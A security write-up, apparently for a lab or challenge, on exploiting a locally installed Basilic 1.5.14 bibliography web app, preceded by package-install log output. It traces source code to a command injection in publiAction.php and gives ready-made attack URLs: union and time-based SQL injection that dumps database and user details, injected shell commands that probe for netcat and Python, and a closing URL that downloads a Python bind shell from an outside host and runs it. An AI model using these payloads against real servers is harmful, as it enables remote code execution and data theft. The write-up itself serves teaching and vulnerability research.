Selecting previously unselected package libavahi-common3:amd64.
Unpacking libavahi-common3:amd64 (from .../libavahi-common3_0.6.31-2_amd64.deb) ...
Selecting previously unselected package libavahi-client3:amd64.
Unpacking libavahi-client3:amd64 (from .../libavahi-client3_0.6.31-2_amd64.deb) ...
Selecting previously unselected package libcups2:amd64.
Unpacking libcups2:amd64 (from .../libcups2_1.5.3-5+deb7u1_amd64.deb) ...
Selecting previously unselected package libjpeg8:amd64.
Unpacking libjpeg8:amd64 (from .../libjpeg8_8d-1_amd64.deb) ...
Selecting previously unselected package libpng12-0:amd64.
Unpacking libpng12-0:amd64 (from .../libpng12-0_1.2.49-1_amd64.deb) ...
Selecting previously unselected package libjbig0:amd64.
Unpacking libjbig0:amd64 (from .../libjbig0_2.0-2+deb7u1_amd64.deb) ...
Selecting previously unselected package libtiff4:amd64.
Unpacking libtiff4:amd64 (from .../libtiff4_3.9.6-11_amd64.deb) ...
Selecting previously unselected package libcupsimage2:amd64.
Unpacking libcupsimage2:amd64 (from .../libcupsimage2_1.5.3-5+deb7u1_amd64.deb) ...
Selecting previously unselected package libffi5:amd64.
Unpacking libffi5:amd64 (from .../libffi5_3.0.10-3_amd64.deb) ...
Selecting previously unselected package ttf-dejavu-core.
Unpacking ttf-dejavu-core (from .../ttf-dejavu-core_2.33-3_all.deb) ...
Selecting previously unselected package fontconfig-config.
Unpacking fontconfig-config (from .../fontconfig-config_2.9.0-7.1_all.deb) ...
Selecting previously unselected package libfontconfig1:amd64.
Unpacking libfontconfig1:amd64 (from .../libfontconfig1_2.9.0-7.1_amd64.deb) ...
Selecting previously unselected package libglib2.0-0:amd64.
Unpacking libglib2.0-0:amd64 (from .../libglib2.0-0_2.33.12+really2.32.4-5_amd64.deb) ...
Selecting previously unselected package libjasper1:amd64.
Unpacking libjasper1:amd64 (from .../libjasper1_1.900.1-13_amd64.deb) ...
Selecting previously unselected package libgdk-pixbuf2.0-common.
Unpacking libgdk-pixbuf2.0-common (from .../libgdk-pixbuf2.0-common_2.26.1-1_all.deb) ...
Selecting previously unselected package libgdk-pixbuf2.0-0:amd64.
Unpacking libgdk-pixbuf2.0-0:amd64 (from .../libgdk-pixbuf2.0-0_2.26.1-1_amd64.deb) ...
Selecting previously unselected package libgomp1:amd64.
Unpacking libgomp1:amd64 (from .../libgomp1_4.7.2-5_amd64.deb) ...
Selecting previously unselected package x11-common.
Unpacking x11-common (from .../x11-common_1%3a7.7+3~deb7u1_all.deb) ...
Selecting previously unselected package libice6:amd64.
Unpacking libice6:amd64 (from .../libice6_2%3a1.0.8-2_amd64.deb) ...
Selecting previously unselected package liblcms1:amd64.
Unpacking liblcms1:amd64 (from .../liblcms1_1.19.dfsg-1.2_amd64.deb) ...
Selecting previously unselected package liblcms2-2:amd64.
Unpacking liblcms2-2:amd64 (from .../liblcms2-2_2.2+git20110628-2.2+deb7u1_amd64.deb) ...
Selecting previously unselected package libltdl7:amd64.
Unpacking libltdl7:amd64 (from .../libltdl7_2.4.2-1.1_amd64.deb) ...
Selecting previously unselected package libpaper1:amd64.
Unpacking libpaper1:amd64 (from .../libpaper1_1.1.24+nmu2_amd64.deb) ...
Selecting previously unselected package libsm6:amd64.
Unpacking libsm6:amd64 (from .../libsm6_2%3a1.2.1-2_amd64.deb) ...
Selecting previously unselected package libwmf0.2-7:amd64.
Unpacking libwmf0.2-7:amd64 (from .../libwmf0.2-7_0.2.8.4-10.3_amd64.deb) ...
Selecting previously unselected package poppler-data.
Unpacking poppler-data (from .../poppler-data_0.4.5-10_all.deb) ...
Selecting previously unselected package fonts-droid.
Unpacking fonts-droid (from .../fonts-droid_20111207+git-1_all.deb) ...
Selecting previously unselected package libijs-0.35.
Unpacking libijs-0.35 (from .../libijs-0.35_0.35-8_amd64.deb) ...
Selecting previously unselected package libjbig2dec0.
Unpacking libjbig2dec0 (from .../libjbig2dec0_0.11+20120125-1_amd64.deb) ...
Selecting previously unselected package libgs9-common.
Unpacking libgs9-common (from .../libgs9-common_9.05~dfsg-6.3+deb7u1_all.deb) ...
Selecting previously unselected package libgs9.
Unpacking libgs9 (from .../libgs9_9.05~dfsg-6.3+deb7u1_amd64.deb) ...
Selecting previously unselected package gsfonts.
Unpacking gsfonts (from .../gsfonts_1%3a8.11+urwcyr1.0.7~pre44-4.2_all.deb) ...
Selecting previously unselected package ghostscript.
Unpacking ghostscript (from .../ghostscript_9.05~dfsg-6.3+deb7u1_amd64.deb) ...
Selecting previously unselected package libgraphicsmagick3.
Unpacking libgraphicsmagick3 (from .../libgraphicsmagick3_1.3.16-1.1_amd64.deb) ...
Selecting previously unselected package graphicsmagick.
Unpacking graphicsmagick (from .../graphicsmagick_1.3.16-1.1_amd64.deb) ...
Selecting previously unselected package libglib2.0-data.
Unpacking libglib2.0-data (from .../libglib2.0-data_2.33.12+really2.32.4-5_all.deb) ...
Selecting previously unselected package libpaper-utils.
Unpacking libpaper-utils (from .../libpaper-utils_1.1.24+nmu2_amd64.deb) ...
Selecting previously unselected package shared-mime-info.
Unpacking shared-mime-info (from .../shared-mime-info_1.0-1+b1_amd64.deb) ...
Selecting previously unselected package graphicsmagick-imagemagick-compat.
Unpacking graphicsmagick-imagemagick-compat (from .../graphicsmagick-imagemagick-compat_1.3.16-1.1_all.deb) ...
Processing triggers for man-db ...
Processing triggers for mime-support ...
Setting up libavahi-common-data:amd64 (0.6.31-2) ...
Setting up libavahi-common3:amd64 (0.6.31-2) ...
Setting up libavahi-client3:amd64 (0.6.31-2) ...
Setting up libcups2:amd64 (1.5.3-5+deb7u1) ...
Setting up libjpeg8:amd64 (8d-1) ...
Setting up libpng12-0:amd64 (1.2.49-1) ...
Setting up libjbig0:amd64 (2.0-2+deb7u1) ...
Setting up libtiff4:amd64 (3.9.6-11) ...
Setting up libcupsimage2:amd64 (1.5.3-5+deb7u1) ...
Setting up libffi5:amd64 (3.0.10-3) ...
Setting up ttf-dejavu-core (2.33-3) ...
Setting up fontconfig-config (2.9.0-7.1) ...
Setting up libfontconfig1:amd64 (2.9.0-7.1) ...
Setting up libglib2.0-0:amd64 (2.33.12+really2.32.4-5) ...
No schema files found: doing nothing.
Setting up libjasper1:amd64 (1.900.1-13) ...
Setting up libgdk-pixbuf2.0-common (2.26.1-1) ...
Setting up libgdk-pixbuf2.0-0:amd64 (2.26.1-1) ...
Setting up libgomp1:amd64 (4.7.2-5) ...
Setting up x11-common (1:7.7+3~deb7u1) ...
[ ok ] Setting up X socket directories... /tmp/.X11-unix /tmp/.ICE-unix.
Setting up libice6:amd64 (2:1.0.8-2) ...
Setting up liblcms1:amd64 (1.19.dfsg-1.2) ...
Setting up liblcms2-2:amd64 (2.2+git20110628-2.2+deb7u1) ...
Setting up libltdl7:amd64 (2.4.2-1.1) ...
Setting up libpaper1:amd64 (1.1.24+nmu2) ...

Creating config file /etc/papersize with new version
Setting up libsm6:amd64 (2:1.2.1-2) ...
Setting up libwmf0.2-7:amd64 (0.2.8.4-10.3) ...
Setting up poppler-data (0.4.5-10) ...
Setting up fonts-droid (20111207+git-1) ...
Setting up libijs-0.35 (0.35-8) ...
Setting up libjbig2dec0 (0.11+20120125-1) ...
Setting up libgs9-common (9.05~dfsg-6.3+deb7u1) ...
Setting up libgs9 (9.05~dfsg-6.3+deb7u1) ...
Setting up gsfonts (1:8.11+urwcyr1.0.7~pre44-4.2) ...
Setting up ghostscript (9.05~dfsg-6.3+deb7u1) ...
Setting up libgraphicsmagick3 (1.3.16-1.1) ...
Setting up graphicsmagick (1.3.16-1.1) ...
Setting up libglib2.0-data (2.33.12+really2.32.4-5) ...
Setting up libpaper-utils (1.1.24+nmu2) ...
Setting up shared-mime-info (1.0-1+b1) ...
Setting up graphicsmagick-imagemagick-compat (1.3.16-1.1) ...
root@dev:/var/www/basilic-1.5.14# cd ../..
root@dev:/var# chown -R www-data:www-data www/

One last look at the checkConfig.php script and everything, other than the IP and lab name, is correct (I'm sure we can carry on without those 2 things).

Getting To Know The App

Firstly I'd like to say that this application is riddled with vulnerabilities, after using the application for a short while I found an XSS:

And an SQLi in the same field of the same page!:

The full URL for the above SQLi is:

http://dev/basilic-1.5.14/Public/?author=foo%27%20union%20select%201,%202,%20%28select%20version%28%29%29,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%20%28select%20database%28%29%29,%2016,%2017,%20%28select%20@@datadir%29,%2019,%2020,%2021,%2022,%2023,%20%28select%20system_user%28%29%29,%20%28select%20user%28%29%29;%20--%20&title=bar&year=-1&display=list&x=0&y=0

I found this SQLi using this URL:

http://dev/basilic-1.5.14/Public/?author=foo%27%20union%20select%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20sleep%2815%29;%20--%20&title=bar&year=-1&display=list&x=0&y=0

But we are here to find a command injection.

Now that we have it installed, its time to get to know the application. We know there is a command injection, we know its written in PHP and we have the source code, so let's search through the source code for system:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
root@dev:/var# cd www/basilic-1.5.14/
root@dev:/var/www/basilic-1.5.14# grep -r system *
CHANGELOG:  Minor bug fixes. Easier update of an existing Basilic system.
checkConfig.php:  This file is part of the Basilic system
checkConfig.php:      system('echo $PATH');
checkConfig.php:      system("which \"convert\"");
checkConfig.php:$message.="Congratulation, your system checking is probably complete and you can now install Basilic on your web server.\n";
checkConfig.php:  echo "An e-mail has been sent to Basilic system administrator (<code>/tmp/basilic-log.txt</code>). Check that you received it.<br/>\n";
Config/install.html:  This file is part of the Basilic system
Config/install.html:updating an existing <code>Basilic</code> system, see the <a href="#update">update section</a>).
Config/diff.php:system("diff ../$_GET[old]/$_GET[file] $_GET[new]/$_GET[file] | sed s%\"<\"%\"\&lt;\"%g | sed s%\">\"%\"\&gt;\"%g");
Config/tables.txt:# This file is part of the Basilic system
Config/checkConfig.php:  This file is part of the Basilic system
Config/checkConfig.php:      system('echo $PATH');
Config/checkConfig.php:      system("which \"@@ConvertCommand@@\"");
Config/checkConfig.php:$message.="Congratulation, your system checking is probably complete and you can now install Basilic on your web server.\n";
Config/checkConfig.php:  echo "An e-mail has been sent to Basilic system administrator (<code>@@AdminNotification@@</code>). Check that you received it.<br/>\n";
Config/tables.txt.new:# This file is part of the Basilic system
configure:# This file is part of the Basilic system
configure:# All these paths are expressed with respect to web server file system.
Import/bibtex2table:# This file is part of the Basilic system
Import/pyxdkbibtex.py:# This file is part of the Basilic system
index.html:  This file is part of the Basilic system
index.html:  <li>Simple semi-automatic system installation</li>
install.html:  This file is part of the Basilic system
install.html:updating an existing <code>Basilic</code> system, see the <a href="#update">update section</a>).
Intranet/updatePubliDocs.php:         @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
Intranet/install.html:  This file is part of the Basilic system
Intranet/install.html:updating an existing <code>Basilic</code> system, see the <a href="#update">update section</a>).
Intranet/cnrs.html:system.
Intranet/basilic.html:  <li>Simple semi-automatic system installation</li>
LICENCE:operating system on which the executable runs, unless that component
LICENCE:integrity of the free software distribution system, which is
LICENCE:through that system in reliance on consistent application of that
LICENCE:system; it is up to the author/donor to decide if he or she is willing
LICENCE:to distribute software through any other system and a licensee cannot
Public/updatePubliDocs.php:       @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
Sources/CSS/backoffice.css:This file is part of the Basilic system
Sources/CSS/publi.css:This file is part of the Basilic system
Sources/CSS/header.css:This file is part of the Basilic system
Sources/CSS/listpubli.css:This file is part of the Basilic system
Sources/CSS/basilic.css:This file is part of the Basilic system
Sources/Public/search.php:This file is part of the Basilic system
Sources/Public/index.php:This file is part of the Basilic system
Sources/Public/updatePubliDocs.php:This file is part of the Basilic system
Sources/Public/updatePubliDocs.php:       @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
Sources/Public/setLanguage.php:This file is part of the Basilic system
Sources/Public/publiUtils.php:This file is part of the Basilic system
Sources/Public/getLanguage.php:This file is part of the Basilic system
Sources/Public/header.php:This file is part of the Basilic system
Sources/Public/footer.php:This file is part of the Basilic system
Sources/Public/utils.php:This file is part of the Basilic system
Sources/Public/publi.php:This file is part of the Basilic system
Sources/Intranet/updatePubliDocs.php:This file is part of the Basilic system
Sources/Intranet/updatePubliDocs.php:         @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
Sources/Intranet/intro.html:This file is part of the Basilic system
Sources/Intranet/commonMenu.html:This file is part of the Basilic system
Sources/Intranet/cnrs.html:This file is part of the Basilic system
Sources/Intranet/cnrs.html:system.
Sources/Intranet/Publications/publiAction.php:This file is part of the Basilic system
Sources/Intranet/Publications/index.html:This file is part of the Basilic system
Sources/Intranet/Publications/publi.php:This file is part of the Basilic system
Sources/Intranet/Publications/updatePublis.php:This file is part of the Basilic system
Sources/Intranet/Publications/menuPubli.php:This file is part of the Basilic system
Sources/Intranet/basilic.html:This file is part of the Basilic system
Sources/Intranet/basilic.html:  <li>Simple semi-automatic system installation</li>
Sources/Intranet/index.html:This file is part of the Basilic system
Sources/Intranet/utils.php:This file is part of the Basilic system
Sources/Intranet/Authors/authorAction.php:This file is part of the Basilic system
Sources/Intranet/Authors/menuAuthor.php:This file is part of the Basilic system
Sources/Intranet/Authors/index.html:This file is part of the Basilic system
Sources/Intranet/Authors/author.php:This file is part of the Basilic system
Binary file Sources/Intranet/Images/import.jpg matches
Binary file Sources/Intranet/Images/export.jpg matches
Sources/Intranet/usersguide.html:This file is part of the Basilic system
usersguide.html:  This file is part of the Basilic system

2 things stick out at me here. Firstly, on line 11 there is clearly a command injection vulnerability here:

Here I am just running cat /etc/passwd and you can see the output on the page.

As it turns out, this is that actual vulnerability that the challenge required, regardless, I was unhappy with this and carried on looking for the other command injection that I thought was there. Lastly, on lines 27, 37, 46 and 55 contain this string: @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);

There are 3 parts of this call to system which could be vuilnerable to command injection, looking through 1 of the files that contain this string to figure out if we can manipulate this value:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
root@dev:/var/www/basilic-1.5.14# grep '$publiPath' Sources/Intranet/updatePubliDocs.php
  $publiPath = "@@DocumentRoot@@/$pubPath/$msgPath";
  if (!is_dir($publiPath))
      mkdir($publiPath, 0777);
      if (!is_dir($publiPath))
        error("Error : directory $publiPath could not be created.");
      $file="$publiPath/index.php";
  if (!is_dir("$publiPath/$thumbDir"))
    mkdir("$publiPath/$thumbDir") or error("Unable to create $publiPath/$thumbDir directory");
  $thumbDirOk = (is_dir("$publiPath/$thumbDir")) && (is_writable("$publiPath/$thumbDir"));
  $dir = dir($publiPath);
    if ($file != "." && $file != ".." && is_file("$publiPath/$file"))
    $entry["size"] = filesize("$publiPath/$file");
        $imgSize = getimagesize("$publiPath/$file");
        if ($thumbDirOk && !is_file("$publiPath/$thumbDir/$thumbName") || filemtime("$publiPath/$file") > (filemtime("$publiPath/$thumbDir/$thumbName")))
            exec("MAGICK_HOME=".getenv("MAGICK_HOME")."; export MAGICK_HOME; convert -geometry $thumbImgGeometry $publiPath/$file $publiPath/$thumbDir/$thumbName", $output, $returnVar);
        if ($thumbDirOk && !is_file("$publiPath/$thumbDir/$thumbName") || filemtime("$publiPath/$file") > (filemtime("$publiPath/$thumbDir/$thumbName")))
        if (!copy("@@DocumentRoot@@/@@ImagesPath@@/defaultThumb.jpg", "$publiPath/$thumbDir/$thumbName"))
        if (is_file("$publiPath/$thumbDir/$thumbName"))
        $imgSize = getimagesize("$publiPath/$thumbDir/$thumbName");
        sendMessage("Unrecognized document format for file $publiPath/$file");
      if (!is_file("$publiPath/$thumbDir/$src.jpg"))
          @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
root@dev:/var/www/basilic-1.5.14# grep '$pubPath' Sources/Intranet/updatePubliDocs.php
  $pubPath = "@@PublicationsPath@@";
  $publiPath = "@@DocumentRoot@@/$pubPath/$msgPath";
  $msg = "<a href='/$pubPath/$msgPath'>$row[bibTex]</a> &nbsp; ";
      $yearPath = "@@DocumentRoot@@/$pubPath/$row[year]";
root@dev:/var/www/basilic-1.5.14# grep '$msgPath' Sources/Intranet/updatePubliDocs.php
  $msgPath = "$row[year]/$row[bibTex]";
  $publiPath = "@@DocumentRoot@@/$pubPath/$msgPath";
  $msg = "<a href='/$pubPath/$msgPath'>$row[bibTex]</a> &nbsp; ";
    error("Publication directory $msgPath does not exist.");
        error("Unable to create /$msgPath/index.php");
    sendMessage("Thumbnail directory $msgPath/$thumbDir is not writeable");
            echo "  $msg : Creating $msgPath/$thumbDir/$thumbName<br />\n";
            echo "Unable to create thumbnail for $msgPath/$file. Administrator has been warned";
            sendMessage("Unable to create thumbnail for $msgPath/$file error=$returnVar");
        // sendMessage("Thumbnail up to date for ".$msgPath.$file);
        echo "Unable to create thumbnail for $msgPath/$file. Administrator has been warned";
        sendMessage("Unable to determine image size for $msgPath/$file");
        echo "Thumbnail will soon be created for $msgPath/$file.<br/>\n";
        sendMessage("Thumbnail must be created for $msgPath/$file");
          sendMessage("Unable to copy default movie thumb for $msgPath/$file");
        sendMessage("Unable to retrieve thumbnail size for $msgPath/$file");
        echo "Unrecognized document format : $msgPath/$file<br/>\n";
        sendMessage("Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn't exist !");
        sendMessage("Unable to remove $msgPath/$thumbDir/$src.jpg");
root@dev:/var/www/basilic-1.5.14# grep '$thumbDir' Sources/Intranet/updatePubliDocs.php
  $thumbDir=".thumbs";
  if (!is_dir("$publiPath/$thumbDir"))
    mkdir("$publiPath/$thumbDir") or error("Unable to create $publiPath/$thumbDir directory");
  $thumbDirOk = (is_dir("$publiPath/$thumbDir")) && (is_writable("$publiPath/$thumbDir"));
  if (!$thumbDirOk)
    sendMessage("Thumbnail directory $msgPath/$thumbDir is not writeable");
        if ($thumbDirOk && !is_file("$publiPath/$thumbDir/$thumbName") || filemtime("$publiPath/$file") > (filemtime("$publiPath/$thumbDir/$thumbName")))
            echo "  $msg : Creating $msgPath/$thumbDir/$thumbName<br />\n";
            exec("MAGICK_HOME=".getenv("MAGICK_HOME")."; export MAGICK_HOME; convert -geometry $thumbImgGeometry $publiPath/$file $publiPath/$thumbDir/$thumbName", $output, $returnVar);
        if ($thumbDirOk && !is_file("$publiPath/$thumbDir/$thumbName") || filemtime("$publiPath/$file") > (filemtime("$publiPath/$thumbDir/$thumbName")))
        if (!copy("@@DocumentRoot@@/@@ImagesPath@@/defaultThumb.jpg", "$publiPath/$thumbDir/$thumbName"))
        if (is_file("$publiPath/$thumbDir/$thumbName"))
        $imgSize = getimagesize("$publiPath/$thumbDir/$thumbName");
      if (!is_file("$publiPath/$thumbDir/$src.jpg"))
        sendMessage("Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn't exist !");
          @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
        sendMessage("Unable to remove $msgPath/$thumbDir/$src.jpg");
root@dev:/var/www/basilic-1.5.14# grep '$src' Sources/Intranet/updatePubliDocs.php
      $src = ereg_replace(".*source='([^']*).*", "\\1", $docInDataBase["$docId"]);
      echo "  $msg : Removing $src from database<br />\n";
      if (!is_file("$publiPath/$thumbDir/$src.jpg"))
        sendMessage("Cannot remove $msgPath/$thumbDir/$src.jpg : it doesn't exist !");
          @system("rm $publiPath/$thumbDir/$src.jpg", $retVal);
        sendMessage("Unable to remove $msgPath/$thumbDir/$src.jpg");
root@dev:/var/www/basilic-1.5.14# grep '$row' Sources/Intranet/updatePubliDocs.php
function sourceString($row)
  return "type='".$row["type"]."', source='".$row["source"]."'";
function sizeString($row)
  return "size='".$row["size"]."', sizeX='".$row["sizeX"]."', sizeY='".$row["sizeY"]."'";
  while ($result && $row=mysql_fetch_array($result))
      $docInDataBase[$row["id"]]=sourceString($row);
      $docSize[$row["id"]]=sizeString($row);
    $row=mysql_fetch_array($result);
  $msgPath = "$row[year]/$row[bibTex]";
  $msg = "<a href='/$pubPath/$msgPath'>$row[bibTex]</a> &nbsp; ";
      $yearPath = "@@DocumentRoot@@/$pubPath/$row[year]";
        echo "Creating year directory $row[year]<br/>\n";
          echo "Creating index.php in $row[year]<br/>\n";
          fwrite($f, "<"."?php if (empty(\$_GET[\"year\"])) \$year=$row[year]; include(\"../index.php\"); ?".">");
root@dev:/var/www/basilic-1.5.14# grep '$result' Sources/Intranet/updatePubliDocs.php
  $result = sqlQuery("SELECT * FROM docs, publidocs WHERE publidocs.idPubli=$publiId AND publidocs.idDoc=docs.id");  
  while ($result && $row=mysql_fetch_array($result))
  $result = sqlQuery("SELECT year, bibTex FROM publis WHERE id=$publiId");
  if ($result)
    $row=mysql_fetch_array($result);

Here I am searching through the file Sources/Intranet/updatePubliDocs.php for each section on that string. First I search for $publiPath on line 1 and its clear from line 2 that $publiPath is made from the string @@DocumentRoot@@/$pubPath/$msgPath.

We can't manipulate @@DocumentRoot@@, so next I search for $pubPath on line 24. Line 25 makes it clear that we are unable to manipulate this too so next I search for $msgPath on line 29. It looks like we might be able to manipulate this but let's check the other parts first.

On line 49 I search for $thumbDir but line 50 shows we can't manipulate this and on line 67 I search for $src but line 68 shows this isn't useful.

So back to $msgPath, the code that sets it $msgPath = "$row[year]/$row[bibTex]"; on line 30 shows that the variable $row is used. Searching for $row, on line 74, shows that it is set using a MySQL query on line 82. This query is built and put into the variable $result before run.

Lastly I search for $result on line 89, which shows that the actual query that is being run is SELECT year, bibTex FROM publis WHERE id=$publiId on line 92. So its made of 2 fields year and bibTex in the publis table.

Looking at the schema, year is a 4 digit year field, which isn't useful to us, but bibTex is a 20 character field, we can use this although we will be limited to 20 characters at a time:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
root@dev:/var/www/basilic-1.5.14# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 102
Server version: 5.5.37-0+wheezy1 (Debian)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> \u basilic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show create table publis;
+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Table  | Create Table                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| publis | CREATE TABLE `publis` (
  `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
  `bibTex` varchar(20) NOT NULL DEFAULT '',
  `entry` enum('Article','InProceedings','InBook','Book','PhdThesis','MastersThesis','TechReport','Misc','Booklet','InCollection','Manual','Proceedings','Unpublished') NOT NULL DEFAULT 'Article',
  `address` varchar(255) DEFAULT NULL,
  `booktitle` varchar(255) DEFAULT NULL,
  `chapter` varchar(30) DEFAULT NULL,
  `edition` varchar(50) DEFAULT NULL,
  `editor` varchar(255) DEFAULT NULL,
  `howpublished` varchar(255) DEFAULT NULL,
  `institution` varchar(255) DEFAULT NULL,
  `journal` varchar(255) DEFAULT NULL,
  `keywords` varchar(255) DEFAULT NULL,
  `month` varchar(30) DEFAULT NULL,
  `note` varchar(255) DEFAULT NULL,
  `number` varchar(10) DEFAULT NULL,
  `optkey` varchar(255) DEFAULT NULL,
  `organization` varchar(255) DEFAULT NULL,
  `pages` varchar(15) DEFAULT NULL,
  `publisher` varchar(255) DEFAULT NULL,
  `school` varchar(255) DEFAULT NULL,
  `series` varchar(255) DEFAULT NULL,
  `title` varchar(255) NOT NULL DEFAULT '',
  `type` varchar(255) DEFAULT NULL,
  `volume` varchar(20) DEFAULT NULL,
  `year` year(4) NOT NULL DEFAULT '0000',
  PRIMARY KEY (`id`),
  UNIQUE KEY `bibTex` (`bibTex`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 |
+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

Time to figure out how we insert data into this table.

You can add a publication on the publications page (http://dev/basilic-1.5.14/Intranet/Publications/). It first asks you what type of publication you want to create, I pick anything here. Before you can add a publication you will need to create an author.

Also before you can create a publication, you need to create a Publications directory in the web root and give the web user permissions to write to it:

1
2
root@dev:/var/www/basilic-1.5.14# mkdir ../Publications
root@dev:/var/www/basilic-1.5.14# chown -R www-data:www-data ../Publications

After the author is added and the Publications directory is created you can fill out the form with dummy data. Before I send it I put a single quote (') in one of the fields so that the query breaks:

This is the request that was sent to get this error:

As you can see, we don't seem to have any control over the bibTex field, but we do control the entry field (here we have sent Article) which in the query is just before the bibTex field.

Using this knowledge we can insert a command here and look for where we can run it:

To test this command injection we need to run one of those scripts, if you remember the name of the file was updatePubliDocs.php so we can assume that it was something to do with updating, when you try to edit the publication, there is an update button:

After you fill in a title and click update you should have the following screen:

And checking the /tmp directory, we can see that it has in fact worked:

1
2
3
4
5
root@dev:/var/www/basilic-1.5.14# ls -l /tmp/
total 44
-rw-r--r-- 1 www-data www-data 30620 Jun  3 15:11 basilic-log.txt
-rw-r--r-- 1 root     root     11857 Jun  3 12:42 basilic.original
-rw-rw-rw- 1 www-data www-data     0 Jun  3 15:11 test.txt

Developing The Exploit

Now that we have confirmed a command injection it is time to start developing the exploit.

The request that we sent to run the command was this:

As we can see, we control the previousBibTex field so we might not be limited to 20 characters and we might not need to insert the data into the database first, let's test that we can do this, put the following as the URL:

http://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=update&authorList=2&previousBibTex=%3Btouch+%2Ftmp%2Fthis-is-a-ridiculously-long-file-name-more-than-20-characters.txt&previousYear=0000&id=2&entry=Article&name=&title=1&year=2015&selectFill=&journal=2&volume=&number=&pages=&month=&optkey=&keywords=&note=

This is the same as the actual request execpt we are trying to run the command touch /tmp/this-is-a-ridiculously-long-file-name-more-than-20-characters.txt instead of touch /tmp/test.txt:

And checking the /tmp directory again:

1
2
3
4
5
6
root@dev:/var/www/basilic-1.5.14# ls -l /tmp/
total 44
-rw-r--r-- 1 www-data www-data 32400 Jun  3 15:33 basilic-log.txt
-rw-r--r-- 1 root     root     11857 Jun  3 12:42 basilic.original
-rw-rw-rw- 1 www-data www-data     0 Jun  3 15:13 test.txt
-rw-r--r-- 1 www-data www-data     0 Jun  3 15:33 this-is-a-ridiculously-long-file-name-more-than-20-characters.txt

So now we aren't limited to 20 characters any more and we only need to make 1 request per command.

We need to check for a few tools on the system to see how we can get command line access, so browse to the following URL:

http://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=update&authorList=2&previousBibTex=%3Bnc%20-h%202>%20%2Fvar%2Fwww%2Ftools.txt%3Bpython%20-V%202>>%20%2Fvar%2Fwww%2Ftools.txt%3B&previousYear=0000&id=2&entry=Article&name=&title=1&year=2015&selectFill=&journal=2&volume=&number=&pages=&month=&optkey=&keywords=&note=

Here we are running the following ;nc -h 2> /var/www/tools.txt;python -V 2>> /var/www/tools.txt;, each command is separated by a semicolon ;.

And then browse to http://dev/tools.txt. You should see something like this:

As you can see, we have both netcat and python 2.7.3 installed. As the actual server is running Ubuntu and Ubuntu's version of netcat doesn't have the -e option I'll use python here.

This URL will download a python bind shell that we can connect to and then run it:

http://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=update&authorList=2&previousBibTex=%3Bwget%20-O%20%2Ftmp%2Fbind.py%20https://raw.githubusercontent.com/s7ephen/Tamatebako/master/bindshell.py%3Bpython%20%2Ftmp%2Fbind.py%3B&previousYear=0000&id=2&entry=Article&name=&title=1&year=2015&selectFill=&journal=2&volume=&number=&pages=&month=&optkey=&keywords=&note=

